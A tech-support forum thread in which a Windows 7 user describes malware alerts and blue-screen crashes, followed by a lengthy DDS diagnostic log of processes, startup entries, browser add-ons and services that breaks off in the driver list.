
I am at a loss as to how to save my computer - I have some sort of Malware


  • This topic is locked
57 replies to this topic

#1 baabel

baabel

  • Members
  • 142 posts

Posted 28 December 2014 - 08:21 AM

This is a problem that began the evening of December 27, 2014.

 

It began while I was on line with Internet Explorer. As it happens, I was on the Yahoo website.

Two things are happening.

 

First, I am getting multiple repetitive warnings that Avast Free has blocked malware. The details are different malwares each time, but each appears to end in "iexplore.exe" in the description.

I attach some examples.

 

Second, the screen goes blank several times, I get warnings about the display driver, and then I get a blue screen which says something about a "memory dump" and then the machine reboots.

 

The blue screens usually happen when I am web browsing but not always.

 

Also, web sites are slow to open.

 

Avast Free is up to date; Malwarebytes and Spybot find nothing wrong. I do get CCleaner alerts that I have over 2 GB of data to clean.

 

When I switched to Firefox I still get multiple virus warnings; the bluescreens occur as well.

I also got several blue screens when I was not on any browser.

 

I also attach screen shots of the recent Avast history; I cannot seem to copy the data as a document.

 

I am at a loss as to how to save my computer.

 

Dell XPS 8500. Windows 7.

 

I was able to attach 6 of the 7 images I have prepared.

 

 




 


#2 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts

Posted 28 December 2014 - 09:03 AM

Here are the logfiles that you asked for.

 

Thank you !

 

 

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17496
Run by anonymous at 8:56:44 on 2014-12-28
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12249.8234 [GMT -5:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Security\Avast\AvastSvc.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe
C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
C:\Windows\SysWOW64\svchost.exe -k hpdevmgmt
c:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Program Files (x86)\Dell DataSafe Local Backup\sftservice.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe
C:\Security\Avast\ng\ngservice.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\TOASTER.EXE
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE
C:\Windows\syswow64\dllhost.exe
C:\Security\Eraser\Eraser.exe
C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe
C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\WinZip\WZQKPICK.EXE
c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Common Files\AOL\1341429429\ee\aolsoftware.exe
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ArcCon.ac
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Security\Avast\avastui.exe
C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\ctfmon.exe
C:\Windows\syswow64\napstat.exe
C:\Windows\syswow64\dplaysvr.exe
C:\Windows\syswow64\systray.exe
C:\Windows\syswow64\rundll32.exe
C:\Windows\syswow64\cmmon32.exe
C:\Windows\syswow64\regsvr32.exe
C:\Windows\syswow64\fixmapi.exe
C:\Windows\syswow64\wextract.exe
C:\Windows\syswow64\napstat.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\ctfmon.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\cmmon32.exe
C:\Windows\syswow64\rundll32.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\cmmon32.exe
C:\Windows\syswow64\upnpcont.exe
C:\Windows\syswow64\dpnsvr.exe
C:\Windows\syswow64\dplaysvr.exe
C:\Windows\syswow64\rundll32.exe
C:\Windows\syswow64\dllhst3g.exe
C:\Windows\syswow64\dvdupgrd.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\dvdupgrd.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
\\?\C:\Windows\system32\wbem\WMIADAP.EXE
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.google.com/?gws_rd=ssl
uSearch Bar = Preserve
mWinlogon: Userinit = userinit.exe,
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll
BHO: Spybot-S&D IE Protection: {53707962-6F74-2D53-2644-206D7942484F} -
BHO: CIESpeechBHO Class: {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Security\Avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Bing Bar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -
BHO: SingleInstance Class: {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
TB: Bing Bar: {8dcb7100-df86-4384-8842-8fa844297b3f} -
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [GBMPro9Agent] C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe
uRun: [GarminExpressTrayApp] "C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe"
uRun: [WinCalendar V4] "C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe /q /c"
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRunOnce: [Adobe Speed Launcher] 1419774945
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [ShwiconXP9106] C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
mRun: [StartCCC] "c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [Dell DataSafe Online] C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [ArcSoft Connection Service] C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
mRun: [HostManager] C:\Program Files (x86)\Common Files\AOL\1341429429\ee\AOLSoftware.exe
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [TrueImageMonitor.exe] C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
mRun: [CitrixReceiver] "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
mRun: [ConnectionCenter] "C:\Program Files (x86)\Citrix\ICA Client\concentr.exe" /startup
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [AvastUI.exe] "C:\Security\Avast\AvastUI.exe" /nogui
mRun: [Redirector] "C:\Program Files (x86)\Citrix\ICA Client\redirector.exe" /startup
mRun: [Nikon Message Center 2] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
mRun: [WinCalendar V4] "C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe" /q /c
mRun: [iTunesHelper] "C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
dRun: [WinCalendar V4] "C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe" /q /c
dRun: [GarminExpressTrayApp] "C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\HPDIGI~1.LNK - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\WINZIP~1.LNK - C:\Program Files (x86)\WinZip\WZQKPICK.EXE
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {7815BE26-237D-41A8-A98F-F7BD75F71086} - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} -
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: Garmin Communicator Plug-In - hxxps://static.garmincdn.com/gcp/ie/4.0.3.0/GarminAxControl_32.CAB
TCP: NameServer = 167.206.245.135 167.206.245.136
TCP: Interfaces\{53CD3CEC-463D-4EAF-8926-15D2D03A96A4} : DHCPNameServer = 167.206.245.135 167.206.245.136
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= C:\PROGRA~2\Citrix\ICACLI~1\RSHook.dll
SSODL: WebCheck - <orphaned>
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Security\Avast\aswWebRepIE64.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-TB: avast! Online Security: {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - LocalServer32 - <no file>
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4
x64-Run: [AtherosBtStack] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe"
x64-Run: [AthBtTray] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe"
x64-Run: [CanonSolutionMenu] C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe /logon
x64-Run: [Eraser] "C:\Security\Eraser\Eraser.exe" --atRestart
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [GBMPro8Agentx64] "C:\Program Files\Genie-Soft\GBMPro8x64\GBMAgent.exe"
x64-Run: [Acronis Scheduler2 Service] "C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe"
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
.
INFO: x64-HKLM has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
x64-Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: GoToAssist - C:\Program Files (x86)\Citrix\GoToAssist\822\G2AWinLogon_x64.dll
x64-SSODL: WebCheck - <orphaned>
Hosts: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\anonymous\AppData\Roaming\Mozilla\Firefox\Profiles\1j94e34f.default-1417893552894\
FF - plugin: C:\Audiovisual & Graphics\iTunes\Mozilla Plugins\npitunes.dll
FF - plugin: C:\Audiovisual & Graphics\VLC\npvlc.dll
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll
FF - plugin: C:\Program Files (x86)\Citrix\ICA Client\npURLInterceptorPlugin.dll
FF - plugin: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll
FF - plugin: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_246.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2013-3-15 65776]
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2013-3-15 267632]
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2012-6-28 16152]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2012-7-21 55856]
R0 tdrpman273;Acronis Try&Decide and Restore Points filter (build 273);C:\Windows\System32\drivers\tdrpm273.sys [2012-8-23 1263200]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswsnx.sys [2012-6-30 1050432]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswsp.sys [2012-6-30 436624]
R1 ctxusbm;Citrix USB Monitor Driver;C:\Windows\System32\drivers\ctxusbm.sys [2013-9-24 97768]
R2 AdobeActiveFileMonitor10.0;Adobe Active File Monitor V10;C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [2011-9-14 169624]
R2 AERTFilters;Andrea RT Filters Service;C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [2012-6-28 98208]
R2 afcdpsrv;Acronis Nonstop Backup Service;C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe [2012-8-23 3246040]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2012-6-28 235520]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2014-4-26 29208]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2012-6-30 83280]
R2 aswStm;aswStm;C:\Windows\System32\drivers\aswstm.sys [2013-12-28 116728]
R2 AtherosSvc;AtherosSvc;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe [2011-12-29 106144]
R2 avast! Antivirus;avast! Antivirus;C:\Security\Avast\AvastSvc.exe [2014-11-28 50344]
R2 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE [2011-5-12 249648]
R2 Garmin Core Update Service;Garmin Core Update Service;C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [2014-8-7 438616]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2012-6-28 13592]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-1-10 627936]
R2 Intel® ME Service;Intel® ME Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [2012-6-28 128280]
R2 NAUpdate;Nero Update;C:\Program Files (x86)\Nero\Update\NASvc.exe [2012-7-13 769432]
R2 NOBU;Dell DataSafe Online;C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe [2010-8-25 2823000]
R2 SftService;SoftThinks Agent Service;C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe [2012-6-28 1695040]
R2 UNS;Intel® Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2012-6-28 363800]
R2 VBoxAswDrv;VBoxAsw Support Driver;C:\Security\Avast\ng\vbox\VBoxAswDrv.sys [2014-11-28 271752]
R2 ZAtheros Bt&Wlan Coex Agent;ZAtheros Bt&Wlan Coex Agent;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [2011-12-29 158880]
R2 ZAtheros Wlan Agent;ZAtheros Wlan Agent;C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [2012-6-28 76960]
R3 afcdp;afcdp;C:\Windows\System32\drivers\afcdp.sys [2012-8-23 285280]
R3 AthBTPort;Atheros Virtual Bluetooth Class;C:\Windows\System32\drivers\btath_flt.sys [2011-12-29 36000]
